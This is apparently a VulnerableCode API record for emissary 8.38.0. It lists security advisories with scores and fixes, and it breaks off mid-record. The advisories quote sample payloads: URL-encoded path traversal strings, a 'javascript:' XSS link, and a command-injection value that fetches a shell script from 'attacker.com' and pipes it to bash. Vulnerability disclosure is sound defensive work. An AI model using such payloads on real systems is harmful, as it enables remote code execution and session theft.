Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1055729?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1055729?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.38.0", "type": "maven", "namespace": "gov.nsa.emissary", "name": "emissary", "version": "8.38.0", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "8.43.0", "latest_non_vulnerable_version": "8.43.0", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350507?format=api", "vulnerability_id": "VCID-41ah-1nyc-aych", "summary": "Emissary has a Path Traversal via Blacklist Bypass in Configuration API\n## Summary\n\nThe configuration API endpoint (`/api/configuration/{name}`) validated\nconfiguration names using a blacklist approach that checked for `\\`, `/`, `..`,\nand trailing `.`. This could potentially be bypassed using URL-encoded variants,\ndouble-encoding, or Unicode normalization to achieve path traversal and read\nconfiguration files outside the intended directory.\n\n## Details\n\n### Vulnerable code — `Configs.java` (line 126)\n\n```java\nprotected static String validate(String config) {\n if (StringUtils.isBlank(config) || config.contains(\"\\\\\") || config.contains(\"/\")\n || config.contains(\"..\") || config.endsWith(\".\")) {\n throw new IllegalArgumentException(\"Invalid config name: \" + config);\n }\n return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\n### Weakness\n\nThe blacklist blocked literal `\\`, `/`, `..`, and trailing `.` but could\npotentially miss:\n\n- URL-encoded variants (`%2e%2e%2f`) if decoded after validation\n- Double-encoded sequences (`%252e%252e%252f`)\n- Unicode normalization bypasses\n- The approach relies on string matching rather than canonical path resolution\n\n### Impact\n\n- Potential read access to configuration files outside the intended config\n directory\n- Information disclosure of sensitive configuration values\n\n## Remediation\n\nFixed in [PR #1292](https://github.com/NationalSecurityAgency/emissary/pull/1292),\nmerged into release 8.39.0.\n\nThe blacklist was replaced with an allowlist regex that only permits characters\nmatching `^[a-zA-Z0-9._-]+$`:\n\n```java\nprotected static final Pattern VALID_CONFIG_NAME = Pattern.compile(\"^[a-zA-Z0-9._-]+$\");\n\nprotected static String validate(String config) {\n if (!VALID_CONFIG_NAME.matcher(config).matches() || config.contains(\"..\") || config.endsWith(\".\")) {\n throw new IllegalArgumentException(\"Invalid config name: \" + config);\n }\n return Strings.CS.appendIfMissing(config.trim(), CONFIG_FILE_ENDING);\n}\n```\n\nThis ensures that any character outside the allowed set — including encoded\nslashes, percent signs, and Unicode sequences — is rejected before the config\nname reaches the filesystem.\n\nTests were added to verify that URL-encoded (`%2e%2e%2f`), double-encoded\n(`%252e%252e%252f`), and Unicode (`U+002F`) traversal attempts are blocked.\n\n## Workarounds\n\nIf upgrading is not immediately possible, deploy a reverse proxy or WAF rule\nthat rejects requests to `/api/configuration/` containing encoded path traversal\nsequences.\n\n## References\n\n- [PR #1292 — validate config name with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1292)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35583", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11568", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11499", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11558", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11534", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0005", 
"scoring_system": "epss", "scoring_elements": "0.15512", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15513", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15473", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15422", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15452", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15526", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15449", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15327", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.0005", "scoring_system": "epss", "scoring_elements": "0.15456", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17121", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17028", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.16999", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00055", "scoring_system": "epss", "scoring_elements": "0.17033", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35583" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": 
"https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1292", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1292" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-09T16:12:26Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-hxf2-gm22-7vcm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35583", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35583" }, { "reference_url": "https://github.com/advisories/GHSA-hxf2-gm22-7vcm", "reference_id": "GHSA-hxf2-gm22-7vcm", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-hxf2-gm22-7vcm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", 
"is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35583", "GHSA-hxf2-gm22-7vcm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-41ah-1nyc-aych" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350492?format=api", "vulnerability_id": "VCID-d1zn-ry4s-cbff", "summary": "Emissary has Stored XSS via Navigation Template Link Injection\n## Summary\n\nMustache navigation templates interpolated configuration-controlled link values\ndirectly into `href` attributes without URL scheme validation. An administrator\nwho could modify the `navItems` configuration could inject `javascript:` URIs,\nenabling stored cross-site scripting (XSS) against other authenticated users\nviewing the Emissary web interface.\n\n## Details\n\n### Vulnerable code — `nav.mustache` (line 10)\n\n```html\n{{#navItems}}\n<li class=\"nav-item\">\n <a class=\"nav-link\" href=\"{{link}}\">{{display}}</a>\n</li>\n{{/navItems}}\n```\n\nThe `{{link}}` value was rendered without any scheme validation. Mustache's\ndefault HTML escaping protects against injection of new HTML tags but does\n**not** prevent `javascript:` URIs in `href` attributes, since `javascript:`\ncontains no characters that HTML-escaping would alter.\n\n### Attack vector\n\nAn administrator sets a navigation item's link to:\n```\njavascript:alert(document.cookie)\n```\n\nAny authenticated user who clicks the navigation link executes the script in\ntheir browser context.\n\n### Impact\n\n- Session hijacking via cookie theft\n- Actions performed on behalf of the victim user\n- Requires administrative access to modify navigation configuration\n- Requires user interaction (clicking the malicious link)\n\n### Mitigating factors\n\n- Exploitation requires administrative access to modify the `navItems`\n configuration\n- User interaction (clicking the link) is required\n- The Emissary web interface is typically accessed only by authenticated\n operators within a trusted network\n\n## Remediation\n\nFixed in [PR #1293](https://github.com/NationalSecurityAgency/emissary/pull/1293),\nmerged into release 8.39.0.\n\n### Server-side link validation — `NavAction.java`\n\nAn allowlist regex was added that only permits `http://`, `https://`, or\nsite-relative (`/`) URLs:\n\n```java\nprivate static final Pattern VALID_LINK = Pattern.compile(\"^(https?:/)?/.*\");\n\nprivate static boolean isValidLink(String link) {\n if (!VALID_LINK.matcher(link).matches()) {\n logger.warn(\"Skipping invalid navigation link '{}'\", link);\n return false;\n }\n return true;\n}\n```\n\nInvalid links are logged and silently dropped from the rendered navigation.\n\n### Template hardening — `nav.mustache`\n\nAdded `rel=\"noopener noreferrer\"` to all navigation link anchor tags as a\ndefense-in-depth measure:\n\n```html\n<a class=\"nav-link\" href=\"{{link}}\" rel=\"noopener noreferrer\">{{display}}</a>\n```\n\nTests were added to verify that `javascript:` and `ftp://` URIs are rejected\nwhile `http://`, `https://`, and site-relative (`/path`) links are accepted.\n\n## Workarounds\n\nIf upgrading is not immediately possible, audit the navigation configuration\nto ensure all `navItems` link values use only `http://`, `https://`, or\nrelative (`/`) URL schemes.\n\n## References\n\n- [PR #1293 — validate nav links](https://github.com/NationalSecurityAgency/emissary/pull/1293)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35571", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07495", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07477", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07489", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.07471", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08173", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08211", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08237", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08076", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08089", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00029", "scoring_system": "epss", "scoring_elements": "0.08192", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09184", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.0902", "published_at": "2026-05-05T12:55:00Z" }, { "value": 
"0.00032", "scoring_system": "epss", "scoring_elements": "0.09107", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10307", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10234", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.10211", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00035", "scoring_system": "epss", "scoring_elements": "0.1025", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35571" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1293", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1293" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:56:55Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35571", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35571" }, { "reference_url": "https://github.com/advisories/GHSA-cpm7-cfpx-3hvp", "reference_id": "GHSA-cpm7-cfpx-3hvp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cpm7-cfpx-3hvp" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35571", "GHSA-cpm7-cfpx-3hvp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", 
"resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-d1zn-ry4s-cbff" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/349659?format=api", "vulnerability_id": "VCID-fgcj-zvq7-e3ea", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35582", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1679", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.16756", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18681", "published_at": "2026-05-12T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18649", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18686", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18584", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.1867", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18778", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.185", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18625", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00072", "scoring_system": "epss", "scoring_elements": "0.2168", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35582" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-35582" }, { "reference_url": 
"https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/commit/1faf33f2494c0128f250d7d2e8f2da99bbd32ae8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35582", "reference_id": "CVE-2026-35582", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35582" }, { "reference_url": "https://github.com/advisories/GHSA-3p24-9x7v-7789", "reference_id": "GHSA-3p24-9x7v-7789", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3p24-9x7v-7789" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789", "reference_id": "GHSA-3p24-9x7v-7789", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" }, { "value": "HIGH", 
"scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-20T15:48:23Z/" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3p24-9x7v-7789" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1066771?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.43.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.43.0" } ], "aliases": [ "CVE-2026-35582", "GHSA-3p24-9x7v-7789" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fgcj-zvq7-e3ea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/349879?format=api", "vulnerability_id": "VCID-u7m6-swgm-tqf9", "summary": "", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35580", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0295", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02899", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0292", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02925", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05162", "published_at": "2026-04-26T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05121", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": 
"0.05096", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.04949", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05076", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.0513", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05201", "published_at": "2026-05-07T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05152", "published_at": "2026-05-05T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05164", "published_at": "2026-04-29T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05912", "published_at": "2026-05-14T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.0589", "published_at": "2026-05-09T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05904", "published_at": "2026-05-11T12:55:00Z" }, { "value": "0.00021", "scoring_system": "epss", "scoring_elements": "0.05905", "published_at": "2026-05-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35580" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1286", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": 
"CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1286" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/pull/1288", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/pull/1288" }, { "reference_url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-3g6g-gq4r-xjm9" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35580" }, { "reference_url": "https://github.com/advisories/GHSA-3g6g-gq4r-xjm9", "reference_id": "GHSA-3g6g-gq4r-xjm9", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3g6g-gq4r-xjm9" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1048895?format=api", "purl": "pkg:maven/gov.nsa.emissary/emissary@8.39.0", "is_vulnerable": true, 
"affected_by_vulnerabilities": [ { "vulnerability": "VCID-fgcj-zvq7-e3ea" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0" } ], "aliases": [ "CVE-2026-35580", "GHSA-3g6g-gq4r-xjm9" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u7m6-swgm-tqf9" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/350526?format=api", "vulnerability_id": "VCID-vst1-rzvp-9bec", "summary": "Emissary has a Command Injection via PLACE_NAME Configuration in Executrix\n## Summary\n\nThe `Executrix` utility class constructed shell commands by concatenating\nconfiguration-derived values — including the `PLACE_NAME` parameter — with\ninsufficient sanitization. Only spaces were replaced with underscores, allowing\nshell metacharacters (`;`, `|`, `$`, `` ` ``, `(`, `)`, etc.) to pass through\ninto `/bin/sh -c` command execution.\n\n## Details\n\n### Vulnerable code — `Executrix.java`\n\n**Insufficient sanitization (line 132):**\n```java\nthis.placeName = this.placeName.replace(' ', '_');\n// ONLY replaces spaces — shell metacharacters pass through\n```\n\n**Shell sink (line 1052–1058):**\n```java\nprotected String[] getTimedCommand(final String c) {\n return new String[] {\"/bin/sh\", \"-c\", \"ulimit -c 0; cd \" + tmpNames[DIR] + \"; \" + c};\n}\n```\n\n### Data flow\n\n1. `PLACE_NAME` is read from a configuration file\n2. `Executrix` applies only a space-to-underscore replacement\n3. The `placeName` is used to construct temporary directory paths (`tmpNames[DIR]`)\n4. `tmpNames[DIR]` is concatenated into a shell command string\n5. The command is executed via `/bin/sh -c`\n\n### Example payload\n\n```\nPLACE_NAME = \"test;curl attacker.com/shell.sh|bash;x\"\n```\n\nAfter the original sanitization: `test;curl_attacker.com/shell.sh|bash;x`\n(semicolons, pipes, and other metacharacters preserved)\n\n### Impact\n\n- Arbitrary command execution on the Emissary host\n- Requires the ability to control configuration values (e.g., administrative\n access or a compromised configuration source)\n\n## Remediation\n\nFixed in [PR #1290](https://github.com/NationalSecurityAgency/emissary/pull/1290),\nmerged into release 8.39.0.\n\nThe space-only replacement was replaced with an allowlist regex that strips all\ncharacters not matching `[a-zA-Z0-9_-]`:\n\n```java\nprotected static final Pattern INVALID_PLACE_NAME_CHARS = Pattern.compile(\"[^a-zA-Z0-9_-]\");\n\nprotected static String cleanPlaceName(final String placeName) {\n return INVALID_PLACE_NAME_CHARS.matcher(placeName).replaceAll(\"_\");\n}\n```\n\nThis ensures that any shell metacharacter in the `PLACE_NAME` configuration\nvalue is replaced with an underscore before it can reach a command string.\n\nTests were added to verify that parentheses, slashes, dots, hash, dollar signs,\nbackslashes, quotes, semicolons, carets, and at-signs are all sanitized.\n\n## Workarounds\n\nIf upgrading is not immediately possible, ensure that `PLACE_NAME` values in all\nconfiguration files contain only alphanumeric characters, underscores, and hyphens.\n\n## References\n\n- [PR #1290 — validate placename with an allowlist](https://github.com/NationalSecurityAgency/emissary/pull/1290)\n- Original report: GHSA-wjqm-p579-x3ww", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35581", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00059", "scoring_system": "epss", "scoring_elements": "0.1845", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00059", 